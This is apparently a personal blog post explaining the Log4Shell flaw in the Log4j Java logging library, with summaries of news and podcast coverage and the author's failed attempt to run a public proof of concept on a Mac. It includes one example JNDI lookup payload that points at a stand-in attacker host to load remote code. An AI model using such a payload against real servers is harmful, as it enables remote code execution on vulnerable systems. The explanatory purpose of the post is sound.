Log4J/Log4Shell — A Software Feature with Unintended Consequences

Source of original picture: https://github.com/kozmer/log4j-shell-poc

According to an article by CNN, hundreds of millions of devices are vulnerable to the Log4Shell exploit, and companies like Apple, IBM, Oracle, Cisco, Google, and Amazon all use the software it targets. Log4j is one of the most popular logging libraries, and is so ubiquitous that even developers who do not work directly with it may be running vulnerable code.

One thing the CNN article does not explain is how the attack actually works and how to carry it out. Fortunately, the more technical side of the Internet has had a field day with this one. Here is a video, for example, of someone using the Log4j vulnerability to hack a computer via Minecraft. I should note that all these people are only simulating the hack on their own systems — not illegally hacking.

The 30-second version (from MalwareTech):

• This vulnerability affects millions of Java applications (and, as the CNN article states, has far-reaching implications)
• Java evaluates strings (if that is the correct term) like “${java:version}” into the actual version
• JNDI allows a user to fetch remote objects from a server
• So, using a string like {$jndi:ldap://hax.local:1389/}, an attacker can load malware onto a vulnerable machine

Below is a demonstration by MalwareTech, the cybersecurity researcher responsible for inadvertently activating the kill switch on WannaCrypt several years ago and buying critical time for impacted hospitals and other targets.

A three-minute video that somehow manages to explain everything without being overly technical.

This is all the result of a feature, not a bug.

How Bad Is It?

“Security Now!” is such a respected podcast that you can actually listen to them to fulfill CompTIA credits. Normally, I think listening to it is a little bit like listening to the news…I think of DarkNetDiaries as the less technical, much more entertaining version of “Security Now.”

But with this episode, I think they really hit the nail on the head.

“Log4j” is a very widely used — as in many many millions of installations — kinda everywhere, open source server-logging JAVA framework. Its job is to log things that happen on a JAVA server. Like the contents of form submissions or HTTP query metadata details, and such…So how widespread is this? Log4j is included with almost all the enterprise products released by the Apache Software Foundation, such as Apache Struts, Flink, Druid, Flume, Solr, Kafka, Dubbo, and probably many more. Open-source projects like Redis, ElasticSearch, Elastic Logstash, the NSA’s Ghidra, and countless others use Log4j in some capacity. And all of the companies that use any of these products are indirectly vulnerable to the Log4Shell exploit, even if some may not be aware of it because Log4j is buried deeply in their infrastructure.

They go on to say that this vulnerability could not be worse, at least in terms of score (the description to this post was their quote), that Apple cloud services were compromised in a research study simply by changing the name of an iPhone, and that the same kind of attack was successfully carried out by changing the name of a Tesla automobile. In conclusion to their show:

A default data logging component that’s deeply embedded into pervasively used JAVA-based open source software has been found to contain an incredibly dangerous and readily exploitable feature which allows remotely located attackers to cause the execution of any code they design on a target’s system. And because this is deliberately universal cross-platform JAVA code, its opportunity for exploitation is also universal and cross-platform.

An Experiment

This guy exploits log4j to seize control of a server…at least in theory. In these types of demonstrations, I typically see someone open up the calculator in a simulated environment, or type “ls.” These aren’t supposed to be cute demos, they are meant to serve as a euphemism for running a secret cryptocurrency miner or scanning your computer for passwords.

There is now a publicly available, open source proof of concept you can download online. I think I got…close to getting it to work.

I know, I am batting a thousand between that and the CakeChat repository (stripped down version of Replika AI) I could not figure out how to run. But the proof of concept demonstration assumes the user is running Ubuntu, or another flavor of Linux. On a Mac, there are subtle differences in how docker and even CLI tools like netcat work. On Windows? No idea. If you want to see this done successfully, watch the Linux video above.

First, I wanted to downgrade to Java 8 without putting the system in danger. Fortunately, on a Mac you do not need to downgrade Java. I modified the exploitation script in Python to match the layout of an OSX machine.

…Meaning I changed like three lines of code so that the paths were different. That is all.

I got everything to run, but I could not gain remote access. Oh well. Maybe next week.

My forked repo

Closing Thoughts

This guy is a legend.

Serious dangers and far-reaching implications aside, this could be a good way to get people interested in technology. Understanding basic utilities and bits and pieces of coding become a means to an end…and the end is entertaining to watch.

Just imagine how thrilled the bug bounty researcher who actually discovered this in Minecraft must have been. Unfortunately, their excitement probably pales in comparison to the hackers who secretly found it first.

As for me, I still have a lot more to do/try in this area. In the meantime, I could benefit from setting up test environments, and maybe trying to get a little more mature with how I troubleshoot.

See you next week.